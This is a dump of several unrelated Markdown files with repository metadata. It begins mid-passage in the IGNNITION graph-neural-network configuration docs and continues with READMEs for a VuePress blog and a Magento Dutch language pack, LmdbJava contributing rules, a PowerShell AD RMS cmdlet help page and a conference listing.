a pipeline of aggregation operations **Accepted values:** Array of [Aggregation operation](#aggregation-operation). --- #### Parameter: update **Description:** Defines the update function. This function will be applied to each of the destination nodes, and given the aggregated input and the current hidden state, will produce the updated hidden-state. **Accepted values:** [Update operation](#update-operation). ### Source entity object: This object ultimately defines how the nodes of a source entity send nodes to the destination entity. This definition also includes the [message function](#message-function-object) which will specify how this souce entity forms its messages. To define this object, we must specify the following parameters: - [Parameter: name](#parameter-name)<br> - [Parameter: message](#parameter-message) --- #### Parameter: name **Description:** Name of the source entity. **Accepted values:** String. It must match the name of an entity defined previously. ```yaml name: source1 ``` --- #### Parameter: message **Description:** Message function which defines how the source entity nodes form the messages to be sent to the destination entity. **Accepted values:** [Message function](#message-function-object) #### Message function object: One of the most important aspects when defining a message passing between a source entity and a destination entity is to specify how the source entities form their messages. To do so, and to support very complex functions, we device a pipe-line of operations, which will be specified in [Operation object](#opeartion-object). An operation performs some calculation and then returns a reference to its output. By doing so, we can concatenate operations, by referencing previous results to obtain increasingle more complicated results. Note that the messages will be, by default, the result of the last operation. Take a look at the subsection ([Operation objects](#operation-object) to find the operations accepted for this sections). We, however, introduce a new specific *Operation* which can be specially usefull to define a message function, which is the [Direct_assignment](#operation:-direct_assignment) operation. ##### Operation: Direct_assignment This operation simply assigns the source hidden states as the message to be sent. By using it, hence, each source node will use its hidden state as the message to be send to each of its neighbour destination node. ```yaml type: direct_assignment ``` ##### Usage example: Let us put all of this together to see an example of how to define a *source_entity* in which nodes of type *entity1* send their hidden states to the corresponding destination nodes. ```yaml source_entities: - name: entity1 message: - type: direct_assignment ``` But as mentioned before, we might want to form more complicated message functions. Below we show a more complicated examples using two [Neural Network operation](#neural-network-operation), and which illustrate the power of the pipe-line of operations. In this pipe-line, we can observe that we first define a neural network which take as input the source entity nodes (using the keyword *source*). Then we save the input by the name a *my_output1* and we reuse it as input of the second neural network altogether with each of the destination nodes respectively. The output of this neural network (for each of the edges of the graph) will be the message that the source node will send to the destination node. ```yaml source_entities: - name: entity1 message: - type: neural_network input: [source] output_name: my_output1 - type: neural_network input: [my_output1, target] ``` An important note is that for the definition of neural networks in the message function, *IGNNITION* reserves the use of *source* and *target* keywords. These keywords are used to reference to the source hidden states of the entity (in this case entity1), and to reference the destination hidden states of the target node. #### Aggregation operation: This object defines the *aggregation function a*. This is to define a function that given the *k* input messages of a given destination node *(m_1, ..., m_k)*, it produces a single aggreagated message for each of the destination nodes. ```yaml aggregated_message = a(m_1, ..., m_k) ``` For this, we provide several keywords that reference the most common aggregated functions used in state-of-art *GNNs*, which should be specified as follows: ```yaml aggregation: - type: sum/min/max/ordered/... ``` Below we provide more details on each of this possible aggregation functions, these being:<br> - [Option 1: sum](#option-1-sum)<br> - [Option 2: mean](#option-2-sum)<br> - [Option 3: min](#option-3-sum)<br> - [Option 4: max](#option-4-sum)<br> - [Option 5: ordered](#option-5-sum)<br> - [Option 6: attention](#option-6-sum)<br> - [Option 7: edge_attention](#option-7-sum)<br> - [Option 8: convolution](#option-8-sum)<br> - [Option 9: concat](#option-9-sum)<br> - [Option 10: interleave](#option-10-sum) --- ##### Option 1: sum This operation aggregates together all the input messages into a single message by summing the messages together. \(aggregated\_message_j = \sum_{i \in N(j)} m_i\) Example: \(m_1 = [1,2,3]\) \(m_2 = [2,3,4]\) \(aggregated\_message_j = [3,5,7]\) In *IGNNITION*, this operation would be represented as: ```yaml aggregation: - type: sum ``` --- ##### Option 2: mean This operation aggregates together all the input messages into a single message by averaging all the messages together. \(aggregated\_message_j = \frac{1}{deg(j)} \sum_{i \in N(j)} m_i\) Example: m_1 = [1,2,3] m_2 = [2,3,4] aggregated_message_j = [1.5,2.5,3.5] In *IGNNITION*, this operation would be defined as: ```yaml aggregation: - type: mean ``` --- ##### Option 3: min This operation aggregates together all the input messages into a single message by computing the minimum over all the received messages. ```yaml aggregation: - type: min ``` --- ##### Option 4: max This operation aggregates together all the input messages into a single message by computing the maximum over all the received messages. ```yaml aggregation: - type: max ``` --- ##### Option 5: ordered This operation produces an aggregated message which consists of an array of all the input messages. This aggregation is intended to be used with a RNN udpate function. Then, the *RNN* automatically updates the hidden state by first treating the first message, then the second message, all the way to the *k-th* message. \(aggregated\_message_j = (m_1|| ... ||m_k)\) ```yaml aggregation: - type: ordered ``` --- ##### Option 6: attention This operation performs the attention mechanism described in paper [Graph Attention Networks](https://arxiv.org/abs/1710.10903). Hence, given a set of input messages *(m_1, ..., m_k)*, it produces a set of *k* weights *(a_1, ..., a_k)*. Then, it performs a weighted sum to end up producing a single aggregated message. \(e_{ij} = \alpha(W * h_i, W * h_j)\) \(\alpha_{ij} = softmax_j(e_{ij})\) \(aggregated\_message_j = \sum_{i \in N(j)} m_i * alpha_{ij}\) ```yaml aggregation: - type: attention ``` --- ##### Option 7: edge-attention This aggregation function performs the edge-attention mechanism, described in paper [Edge Attention-based Multi-Relational Graph Convolutional Networks](https://www.arxiv-vanity.com/papers/1802.04944/). This is based on a variation of the previous "attention" strategy, where we follow a different approach to produce the weights *(a_1, ..., a_k)*. We end up, similarly, producing the aggregated message through a weighted sum of the input messages and the computed weights. \(e_{ij} = f(m_i, m_j)\) \(aggregated\_message_j = \sum_{i \in N(j)} e_{ij} * m_i \) Notice that this aggregation requires of a neural network *e* that will compute an attention weight for each of the neighbors of a given destination node, respectively. Consequently, in this case, we need to include a new parameter *nn_name*, as defined in [nn_name](#parameter-nn_name). In this field, we must include the name of the NN, which we define later on (as done for any NN). In this case, however, remember that this NN must return a single value, in other words, the number of units of the last layer of the network must be 1. This is because we want to obtain a single value that will represent the weight for each of the edges respectively. ```yaml aggregation: - type: edge_attention nn_name: my_network ``` --- ##### Option 8: convolution This aggregation function performs the very popular convolution mechanism, described in paper [Semi-supervised classification with Graph Convolutional Networks](https://arxiv.org/pdf/1609.02907.pdf). Again, we aim to find a set of weights *(a_1, ..., a_k)* for the *k* input messages of a given destination node. In this case, it follows the formulation below. \(aggregated\_message_j = \sum_{i \in N(j)} \frac{1}{\sqrt(deg_i * deg_j)} * h_i * W \) ```yaml aggregation: - type: convolution ``` --- ##### Option 9: concat This aggregation function is specially thought for the cases in which we have a list of messages sent from messages of entity type *"entity1"* and a list of messages from nodes of entity type *"entity2"*. Then, this aggregation function will concatenate together this two lists by the axis indicated in the following field "concat_axis". Then, similarly than with the "ordered" function, we would pass this to an *RNN*, which will update itself iteratively with all the messages received. ###### Parameter: concat_axis **Description:** Axis to use for the concatenation. **Accepted values:** 1 or 2 Given the two lists of messages from "entity1" \([[1,2,3],[4,5,6]]\) and from "entity2" \([[4,5,6],[1,2,3]]\). If concat_axis = 1, we will get a new message \( aggregated\_message_j = [[1,2,3,4,5,6], [4,5,6,1,2,3]]\) If concat_axis = 2, we weill get a new message \(aggregated\_message_j = [[1,2,3], [4,5,6],[4,5,6],[1,2,3]]\) --- #### Option 10: interleave **Description:** To_complete ```yaml aggregation: - type: interleave ``` ##### Option 11: neural_network **Description:** So far we have looked at examples where the aggregated function is defined with a single operation (e.g., max,min,mean...). In some ocasions, however, we must build more complicated functions. This operation, thus, allows to take the results of previous operations and pass them through a NN to compute a new value. **Accepted values:** [Neural network operation](#operation-2-neural_network) **Example of use:**<br> In this case, we need to include the parameter *output_name* at the end of each of the operations that preceed the neural network. This will store each of the results of the operations, which we will then reference in the *neural network operation*. Let us see this with an example ``` aggregation: - type: max output_name: max_value - type: min output_name: min_value - type: attention output_name: attention_value - type: neural_network input: [max_value, min_value, attention_value] nn_name: aggregation_function ``` In this example we compute the max value, the min and the result of applying the attention to the messages received by each of the destination nodes, respectively. Then, the neural network takes as input the results of each of the previous operations, and computes the final aggregated message, used for the update. #### Update operation: In order to define the update function, we must specify a *Neural Network*. Note that the syntax will be the same no matter if the *NN* is a *feed-forward* or a *RNN*. To define it, we must only specify two fields: which are the *type* and the *nn_name*.<br> - [Parameter: type](#parameter-type)<br> - [Parameter: nn_name](#parameter-nn_name) ##### Parameter: type **Description:** This parameter indicates the type of update function to be used **Accepted values:** Right now the only accepted keyword is *neural_network*. We will soon however include new keywords. ##### Parameter: nn_name **Description:** Name of the Neural Network to be used for the upate. **Accepted values:** String. The name should match a *NN* created in [Step 4](#step-4-neural-network-architectures) Below we present an example of how an update function can be defined. Note that in this case the update will be using the *NN* named *my_neural_network*, and which architecture must be later defined. ```yaml update: type: neural_network nn_name: my_neural_network ``` ### Step 3: Readout Just as for the case of the message function, the readout function can potentially be very complex. For this, we follow a similar approach. We define the readout as a pipe-line of [Operation object](#operation-object) which shall allow us to define very complex functions. Again, each of the operations will keep the field *output_name* indicating the name with which we can reference/use the result of this operation in successive opeartions. The main particularity for the defintion of the readout is that in one of the operations (normally the last one), will have to include the name of the *output_label* that we aim to predict. To do so, include the keyword presented below as a property of last *Operation* of your readout function (the output of which will be used as output of the *GNN*). Another important consideration is that in this case, the user can use *entity1_initial_state* as part of the input of an operation (where *entity1* can be replaced for any entity name of the model). With this, the operation will take as input the initial hidden states that were initialized at the beginning of the execution, and thus, before the message-passing phase. #### Parameter: output_label **Description:** Name referencing the labels that we want to predict, which must be defined in the dataset. **Allowed values:** Array of strings. The names should match the labels specified in the dataset. Let us see this with a brief example of a simple readout function based on two [Neural Network operations](#neural-network-operation). In this case we apply two neural networks which are intially to each of the nodes of type *entity1*. Then, the output is concatenated together with each of the nodes of type *entity2* (as long that there is the same number of nodes of each entity) and then applied to the second neural network *my_network2*. Note that the last operation includes the definition of *my_label*, which is the name of the label found in the dataset. To specify this label, we write *$my_label* so as to indicate that this keywords refers to data that *IGNNITION* can find in the corresponding dataset. ```yaml readout: - type: neural_network input: [entity1] nn_name: my_network1 output_label: output1 - type: neural_network input: [output1, entity2] nn_name: my_network2 output_label: [$my_label] ``` Notice, however, that *output_label* may contain more than one label. For instance, consider the case in which we want that the readout function predicts two properties of a node, namely *label1* and *label2*. For simplicity, let us considert these labels to be single values --even though the same proceduce applies when they represent 1-d arrays. For this, we make the following adaptations of the previous model: ```yaml readout: - type: neural_network input: [entity1] nn_name: my_network1 output_label: output1 - type: neural_network input: [output1, entity2] nn_name: my_network2 output_label: [$label1, $label2] ``` In this case, hence, *my_network2* will output two predictions, one for each of the target labels. Then, *IGNNITION* will internally process this and backpropagate accordingly, so as to force the GNN to learn to predict both properties, simultaniously. ### Operation object: We now review the different options of *Operations* that *IGNNITION* allows, and which can be used in many of the parts of the *GNN* (e.g., message function, update function, readout function...). All these possible operations are:<br> - [Operation 1: product](#operation-1-product)<br> - [Operation 2: neural_network](#operation-2-neural_network)<br> - [Operation 3: pooling](#operation-3-pooling) --- #### - Operation 1: product This operation will perform the product of two different inputs. Let us go through the different parameters that we can tune to customize this operation.<br> - [Parameter: input](#parameter-type)<br> - [Parameter: output_name](#parameter-nn_name) - [Parameter: type_product](#parameter-type_product) --- ##### Parameter: input **Description:** Defines the set of inputs to be fed to this operation. **Allowed values:** Array of two strings, defining the two inputs of the *product operation*. Notice that if a string from the input references a feature from the dataset, the name must always be preceeded by a # symbol. This will indicate *IGNNITION* that such keyword references a value present in the dataset. --- ##### Parameter: output_name **Description:** Defines the name by which we can reference the output of this operation if successive operations. **Allowed values:** String --- ##### Parameter: type_product **Description:** Defines the type of product that we use (e.g., element-wise, matrix multiplication, dot-product) **Allowed values:** [dot_product, element_wise, matrix_mult] Let us explain in more detail what each of the following keywords stands for:<br> - [Option 1: dot_product](#option-1-dot_product)<br> - [Option 2: element_wise](#option-2-element_wise)<br> - [Option 3: matrix_mult](#option-3-matrix_mult) --- ###### Option 1: dot_product **Description:** Computes the dot product between two inputs *a* and *b*. Note that if the inputs are two arrays *a = (a_1, a_2, ... , a_k)* and *b = (b_1, ,b_2, ... , b_k)*, then the dot product is applied to *a_i* and *b_i* respectively. **Allowed values:** String. Name of an entity or output of a previous operation. Below we show an example of a readout function which first computes the *dot_product* between nodes of type *entity1* and *entity2*, respectively. Then, the result of each of these operations are passed to a *Neural Network* that compute the prediction. ```yaml readout: - type: product type_product: dot_product input: [entity1, entity2] nn_name: my_network1 output_label: output1 - type: neural_network input: [output1, entity2] nn_name: my_network2 output_label: [$my_label] ``` --- ###### Option 2: element_wise **Description:** Computes the element-wise multiplication between two inputs *a* and *b*. Note that if the inputs are two arrays *a = (a_1, a_2, ... , a_k)* and *b = (b_1, ,b_2, ... , b_k)*, then the element-wise multiplication is applied to *a_i* and *b_i* respectively. **Allowed values:** String. Name of an entity or output of a previous operation. Below we show an example of a readout function which first computes the *element_wise* multiplication between nodes of type *entity1* and *entity2*, respectively. Then, the result of each of these operations are passed to a *Neural Network* that compute the prediction. ```yaml readout: - type: product type_product: dot_product input: [entity1, entity2] nn_name: my_network1 output_label: output1 - type: neural_network input: [output1, entity2] nn_name: my_network2 output_label: [$my_label] ``` --- ###### Option 3: matrix_mult **Description:** Computes the matrix multiplication between two inputs *a* and *b*. Note that if the inputs are two arrays *a = (a_1, a_2, ... , a_k)* and *b = (b_1, ,b_2, ... , b_k)*, then the matrix multiplication is applied to *a_i* and *b_i* respectively. **Allowed values:** String. Name of an entity or output of a previous operation. Below we show an example of a readout function which first computes the *dot_product* between nodes of type *entity1* and *entity2*, respectively. Then, the result of each of these operations are passed to a *Neural Network* that compute the prediction. --- #### Operation 2: neural_network Similarly to the neural_network operations used in the *message* or *update* function, we just need to reference the neural network to be used, and provide a name for the output. Then, given some input \(a\) and a neural network that we define \(f\), this operation performs the following: \(output\_name = f(a)\) Below we show a code-snipped of what a *neural_network* operation would look like, and we present afterward each of its possible options. This neural network takes as input all the states of the nodes of type *entity1*, and pass them (separetely) to our *NN* named *my_network*. Finally it stores the results of these operations in *my_output*. ```yaml - type: neural_network input: [entity1] nn_name: my_network output_name: my_output ``` We can now review in more depth each of its available parameters:<br> - [Parameter: nn_name](#parameter-nn_name)<br> - [Parameter: output_name](#parameter-output_name) --- ##### Parameter: input **Description:** Defines the set of inputs to be fed to this operation. **Allowed values:** Array of strings. If this neural network is part of the readout, you can use *entity1_initial_state* to reference the initial values of the hidden-states of *entity1*. Note that *entity1* can be replaced for any entity name of the model. An important consideration is that all the strings in the input that reference a features --that is present in the dataset-- must be proceeded by a # symbol. This will indicate *IGNNITION* that such keyword references a value from the dataset. --- ##### Parameter: nn_name **Description:** Name of the neural network \(f\), which shall then used to define its actual architecture in [Step 4](#step-4-internal-neural-networks). **Allowed values:** String. This name should match the one from one of the neural networks defined. --- ##### Parameter: output_name **Description:** Defines the name by which we can reference the output of this operation, to be then used in successive operations. **Allowed values:** String An example of the use of this operation is the following *message* function (based on a pipe-line of two different operations): ```yaml message: - type: neural_network input: [entity1] nn_name: my_network1 output_name: my_output - type: neural_network input: [my_output] nn_name: my_network2 ``` With this, hence, we apply two successive neural networks, which is just a prove of some of the powerfull operations that we can define. --- #### Operation 3: pooling The use of this operation is key to make global predictions (over the whole graph) instead of node predictions. This allows to take a set of input \(a_1, ... , a_k\) and a defined function \(g\), to obtain a single resulting output. This is: \(output\_name = g(a_1, ..., a_k)\) For this, we must define, as usual, the *output_name* field, where we specify the name for the output of this operation. Additionally, we must specify which function \(g\) we want to use. Let us see how this operation would look like if used to define a *readout* function to make global predictions over a graph. In this example we again define a pipe-line of opeartions, first of all by pooling all the nodes of type *entity1* together into a single representation (which is stored in my_output. Then we define a neural network operation which takes as input this pooled representation and applies it to a *NN* which aimy to predict our label *my_label*. ```yaml readout: - type: pooling type_pooling: sum/mean/max input: [entity1] output_name: my_output - type: neural_network input: [my_output] nn_name: readout_model output_label: [$my_label] ``` Again, we now present the new keyword that is charactheristic from this specific operation: ##### Parameter: type_pooling: **Description:** This field defines the pooling operation that we want to use to reduce a set of inputs \(a_1, ... , a_k\) to a single resulting output. **Allowed values:** Below we define the several values that this field *type_pooling* can take: Let us now explain in depth what each of the possible types of pooling that *IGNNITION* currently supports: <br> - [Option 1: sum](#option-1-sum)<br> - [Option 2: max](#option-2-max)<br> - [Option 3: mean](#option-3-mean) --- ###### Option 1: sum This operations takes the whole set of inputs \(a_1, ... , a_k\), and sums them all together. \(output\_name = \sum(a_1, ... , a_k)\) ```yaml - type: pooling type_pooling: sum input: [entity1] ``` --- ###### Option 2: max This operations takes the whole set of inputs \(a_1, ... , a_k\), and outputs the its max. \(output\_name = \max(a_1, ... , a_k)\) ```yaml - type: pooling type_pooling: max input: [entity1] ``` --- ###### Option 3: mean This operations takes the whole set of inputs \(a_1, ... , a_k\), and calculates their average. \(output\_name = \frac{1}{k} \sum(a_1, ... , a_k)\) ```yaml - type: pooling type_pooling: mean input: [entity1] ``` ### Step 4: Neural Network architectures In this section we define the architecture of the neural networks that we refenced in all the previous sections. For this, we just need to define an array of [Neural Network object](#neural-network-object). Note that we will use the very same syntax to define either *Feed-forward NN* or *Recurrent NN*. Let us describe what a [Neural Network object](#neural-network-object) looks like: #### Neural Network object A Neural Network object refers to the architecture of an specific Neural Network. To do so, we must define two main fields, these being *nn_name* and *nn_architecture* which we define below. We can now review in more depth each of its available parameters:<br> - [Parameter: nn_name](#parameter-nn_name)<br> - [Parameter: nn_architecture](#parameter-nn_architecture) --- ##### Parameter: nn_name **Description:** Name of the Neural Network. **Accepted values:** String. This name must match all the references to this Neural Network from all the previous sections (e.g., the name of the *NN* of the previous example would be *my_neural_network*) --- ##### Parameter: nn_architecture **Description:** Definition of the actual architecture of the *NN*. **Accepted values:** Array of Layer objects (e.g., a single *Dense* layer for the previous *NN*) Let us now, for sake of the explanation, provide a simple example of how a *Neural Network* object can be defined: ```yaml neural_networks: - nn_name: my_neural_network nn_architecture: - type_layer: Dense units: readout_units ``` #### Layer object To define a Layer, we rely greatly on the well-known [tf.keras library](https://www.tensorflow.org/api_docs/python/tf/keras/layers). In consequence, we just require the user to define the following field. --- ##### Parameter: type_layer **Description:** Here we must indicate the type of layer to be used. Please writte only the layers accepted by the [tf.keras.layers library](https://www.tensorflow.org/api_docs/python/tf/keras/layers) using the same syntax. **Allowed values:** String. It must match a layer from the *tf.keras.layers library* ```yaml - type_layer: Dense/Softmax/... ... ``` ##### Other parameters Additionally, the user can define any other parameter from the [tf.keras library](https://www.tensorflow.org/api_docs/python/tf/keras/layers) corresponding to the type of layer defined. Note that in many occasions, the user is in fact required to define layer specific attributes (e.g., the number of units when creating a Dense layers). Thus, please make sure to define all mandatory parameters, and then, additionally, define optional parameters if needed. E.g., if we define a Dense layer, we must first define the required parameter *units* (as specified by Tensorflow). Then, we can also define any optional parameter for the Dense class (visit [documentation](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dense)) such as the activation or the use of bias. ```yaml - type_layer: Dense units: 32 activation: relu use_bias: False ```
55.826437
1,181
0.754514
eng_Latn
0.998144
53a6588e2d5a043ef67a2642f2d534104917215b
1,824
md
Markdown
README.md
leoxiaoge/leoxiaoge.github.io
db177ce7b1097fa17462cca60d497593b1a38976
[ "Apache-2.0" ]
null
null
null
README.md
leoxiaoge/leoxiaoge.github.io
db177ce7b1097fa17462cca60d497593b1a38976
[ "Apache-2.0" ]
13
2020-04-24T07:26:35.000Z
2022-02-27T02:46:06.000Z
README.md
leoxiaoge/leoxiaoge.github.io
db177ce7b1097fa17462cca60d497593b1a38976
[ "Apache-2.0" ]
null
null
null
### Quick start ``` <script data-ad-client="ca-pub-7005086867582992" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> ``` npx ``` npx @vuepress-reco/theme-cli init my-blog ``` npm ``` # init npm install @vuepress-reco/theme-cli -g theme-cli init my-blog # install cd my-blog npm install # run npm run dev # build npm run build ``` yarn ``` # init yarn global add @vuepress-reco/theme-cli theme-cli init my-blog # install cd my-blog yarn install # run yarn dev # build yarn build ``` ## Welcome to GitHub Pages You can use the [editor on GitHub](https://github.com/leoxiaoge/leoxiaoge.github.io/edit/master/README.md) to maintain and preview the content for your website in Markdown files. Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files. ### Markdown Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for ```markdown Syntax highlighted code block # Header 1 ## Header 2 ### Header 3 - Bulleted - List 1. Numbered 2. List **Bold** and _Italic_ and `Code` text [Link](url) and ![Image](src) ``` For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/). ### Jekyll Themes Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/leoxiaoge/leoxiaoge.github.io/settings). The name of this theme is saved in the Jekyll `_config.yml` configuration file. ### Support or Contact Having trouble with Pages? Check out our [documentation](https://help.github.com/categories/github-pages-basics/) or [contact support](https://github.com/contact) and we’ll help you sort it out.
21.714286
256
0.741776
eng_Latn
0.915865
53a6b14ee1d77753a74df23db3d5fd27cbef4a84
361
md
Markdown
CONTRIBUTING.md
bubblegumproject/lmdbjava
6a3f8acfdbd9fac946e53dac41d01997646c5cf2
[ "Apache-2.0" ]
664
2016-06-30T12:38:07.000Z
2022-03-31T16:31:47.000Z
CONTRIBUTING.md
bubblegumproject/lmdbjava
6a3f8acfdbd9fac946e53dac41d01997646c5cf2
[ "Apache-2.0" ]
190
2016-06-06T13:32:02.000Z
2022-03-24T01:29:18.000Z
CONTRIBUTING.md
bubblegumproject/lmdbjava
6a3f8acfdbd9fac946e53dac41d01997646c5cf2
[ "Apache-2.0" ]
115
2016-07-01T21:20:21.000Z
2022-03-23T09:58:04.000Z
# Contributing Guidelines We welcome patches and pull requests to improve LmdbJava. **Before submitting a PR, please run `mvn clean verify`**. This will run: * Tests * Initial Test Coverage * Checkstyle * PMD * FindBugs * XML Formatting * License Header Management `mvn clean verify` is also run by CI, but it's quicker and easier to run before submitting.
20.055556
72
0.759003
eng_Latn
0.992789
53a6dfe8bb24491fe5bebb42a98c791f34a47597
3,853
md
Markdown
docset/winserver2012r2-ps/adrmsadmin/Get-RmsEncryptedIL.md
machgo/windows-powershell-docs
198d5270da7d72d35bfeb27326c6d322ba358f3b
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
1
2021-05-15T11:23:46.000Z
2021-05-15T11:23:46.000Z
docset/winserver2012r2-ps/adrmsadmin/Get-RmsEncryptedIL.md
machgo/windows-powershell-docs
198d5270da7d72d35bfeb27326c6d322ba358f3b
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
docset/winserver2012r2-ps/adrmsadmin/Get-RmsEncryptedIL.md
machgo/windows-powershell-docs
198d5270da7d72d35bfeb27326c6d322ba358f3b
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
1
2018-11-30T02:02:05.000Z
2018-11-30T02:02:05.000Z
--- external help file: Microsoft.RightsManagementServices.Admin.dll-Help.xml Module Name: ADRMSAdmin online version: schema: 2.0.0 title: Get-RmsEncryptedIL description: keywords: powershell, cmdlet author: brianlic manager: alanth ms.date: 2017-10-30 ms.topic: reference ms.prod: powershell ms.technology: powershell ms.assetid: 0E60DBB0-CC4A-4D2E-832E-970657361CA3 --- # Get-RmsEncryptedIL ## SYNOPSIS Returns use-license information from an issuance license used in a user request for the Active Directory Rights Management Services (AD RMS) cluster. ## SYNTAX ``` Get-RmsEncryptedIL -ILCertificateId <String> [-Path] <String[]> [-WhatIf] [-Confirm] [<CommonParameters>] ``` ## DESCRIPTION This cmdlet generates a report containing information about an issuance license used in a user request on the Active Directory Rights Management Services (AD RMS) cluster. You must be logged in as an Enterprise Administrator to use this cmdlet. To obtain licenses, specify the ILCertificateID of the certificate for which you want to obtain use-license information and then set the Path parameter to the AD RMS provider drive subpath "\<PSDrive\>:\Report" where \<PSDrive\> is the provider drive ID. You can also specify a relative path. For example, "." specifies the current location. Use the Get-RmsCertChain cmdlet to obtain the ILCertificateID of the certificate for which you want to obtain use-license information. The ILCertificateID value returned is valid only for the cluster identified by the Path parameter of Get-RmsCertChain. You cannot use an ILCertificateID to identify the same certificate in different clusters. ## EXAMPLES ### -------------- EXAMPLE 1 -------------- ``` C:\PS>Get-RmsEncryptedIL -Path . -ILCertificateId "YJ3HGsG/ADg3rLm5LwWGgpAJmz4=" | Out-File -FilePath C:\temp\RightsPolicyData.xml ``` This command returns use-license information from an issuance license and saves the results in a file. ## PARAMETERS ### -Confirm Prompts you for confirmation before running the cmdlet. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: cf Required: False Position: Named Default value: False Accept pipeline input: False Accept wildcard characters: False ``` ### -ILCertificateId Specifies the issuance license certificate hash ID. ```yaml Type: String Parameter Sets: (All) Aliases: Required: True Position: Named Default value: None Accept pipeline input: True (ByPropertyName, ByValue) Accept wildcard characters: False ``` ### -Path Specifies a provider drive and path or relative path on the current drive. This parameter is required. Use a dot (.) to specify the current location. This parameter does not accept wildcards and has no default value. ```yaml Type: String[] Parameter Sets: (All) Aliases: Required: True Position: 0 Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -WhatIf Shows what would happen if the cmdlet runs. The cmdlet is not run. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: wi Required: False Position: Named Default value: False Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216). ## INPUTS ## OUTPUTS ## NOTES ## RELATED LINKS [Using Windows PowerShell with AD RMS](http://go.microsoft.com/fwlink/?LinkId=136806) [Get-RmsCertChain](./Get-RmsCertChain.md) [Get-RmsCertInfo](./Get-RmsCertInfo.md) [Get-RmsChildCert](./Get-RmsChildCert.md) [Get-RmsRequestInfo](./Get-RmsRequestInfo.md) [Get-RmsUserRequestReport](./Get-RmsUserRequestReport.md)
27.719424
314
0.772645
eng_Latn
0.769601
53a88ca7d8cf701697f806ac10faf0a5820311ce
575
md
Markdown
site/conferences/2021-an-event-apart-spring-summit-.md
Le0101/conferences
43d7d4d03617f9ca6e013cd22cf7a2cc850af205
[ "MIT" ]
null
null
null
site/conferences/2021-an-event-apart-spring-summit-.md
Le0101/conferences
43d7d4d03617f9ca6e013cd22cf7a2cc850af205
[ "MIT" ]
2
2022-02-07T23:54:54.000Z
2022-02-28T01:40:44.000Z
site/conferences/2021-an-event-apart-spring-summit-.md
Le0101/conferences
43d7d4d03617f9ca6e013cd22cf7a2cc850af205
[ "MIT" ]
null
null
null
--- title: 'An Event Apart: Spring Summit 2021' url: 'https://aneventapart.com/event/spring-summit-2021' cocUrl: 'https://aneventapart.com/registration-information#code-of-conduct' date: 2021-04-19T21:28:27.799Z endDate: 2021-04-21T21:28:27.809Z location: Remote byline: Online Together --- Online Together: Spring Summit is a three-day web design conference with an intense focus on digital design, UX, content, code, and more—featuring 15+ in-depth sessions, Q&A with the speakers, and more. You'll get deep insights into where we are now and where things are going next.
47.916667
282
0.772174
eng_Latn
0.95708
53a89250b5d36aefce1ff36d6fb0e0798c5b668d
2,286
md
Markdown
README.md
peterjaap/language_nl_nl
8107630eb1b0e741c7b3d10ee549df32178975de
[ "MIT" ]
null
null
null
README.md
peterjaap/language_nl_nl
8107630eb1b0e741c7b3d10ee549df32178975de
[ "MIT" ]
null
null
null
README.md
peterjaap/language_nl_nl
8107630eb1b0e741c7b3d10ee549df32178975de
[ "MIT" ]
null
null
null
# Dutch (Nederlands) Magento2 Language Pack (nl_NL) This is a Language Pack generated from the [official Magento2 translations project](https://crowdin.com/project/magento-2) at [Crowdin](https://crowdin.com). The Dutch (Nederlands) translations used can be found [here](https://crowdin.com/project/magento-2/nl). This translation is usefull for people living in the Netherlands (Nederland). For our other language packs look at the [Magento2Translations](http://magento2translations.github.io/) page. # Version & progress This translation is generated from the branch [Head](https://crowdin.com/project/magento-2/nl#/Head) at Crowdin and based on the Magento 2.2.0 sourcefiles. There have been 7744 strings translated of the 8763 strings in the Magento source. Translation progress:![Progress](http://progressed.io/bar/88) # Installation **Please select the git branch appropriate for your magento version from this repo.** ## Via composer To install this translation package with composer you need access to the command line of your server and you need to have [Composer](https://getcomposer.org). ``` cd <your magento path> composer require magento2translations/language_nl_nl:dev-master php bin/magento cache:clean ``` ## Manually To install this language package manually you need access to your server file system. * Download the zip file [here](https://github.com/Magento2Translations/language_nl_nl/archive/master.zip). * Upload the contents to `<your magento path>/app/i18n/magento2translations/language_nl_nl`. * The composer files should then be located like this `<your magento path>/app/i18n/magento2translations/nl_NL/nl_NL.csv`. * Go to your Magento admin panel and clear the caches. #Usage To use this language pack login to your admin panel and goto `Stores -> Configuration -> General > General -> Locale options` and set the '*locale*' option as '*Dutch (Netherlands)*' # Contribute To help push the '*Dutch (Nederlands) Magento2 Language Pack (nl_NL)*' forward please goto [this](https://crowdin.com/project/magento-2/nl) crowdin page and translate the lines. # Authors The translations are done by the [official Magento2 translations project](https://crowdin.com/project/magento-2). Code generation is sponsored by [Wijzijn.Guru](http://www.wijzijn.guru/).
58.615385
182
0.781715
eng_Latn
0.964614
53a9e92c33048301411961b9986075a3a4acfe87
1,050
md
Markdown
content/+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people.md
ransurf/quartz
174c514401f4265b360fb0e22449adeb462cc152
[ "MIT" ]
null
null
null
content/+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people.md
ransurf/quartz
174c514401f4265b360fb0e22449adeb462cc152
[ "MIT" ]
null
null
null
content/+ Studyquil the definitive TIME MANAGEMENT GUIDE for busy but lazy people.md
ransurf/quartz
174c514401f4265b360fb0e22449adeb462cc152
[ "MIT" ]
null
null
null
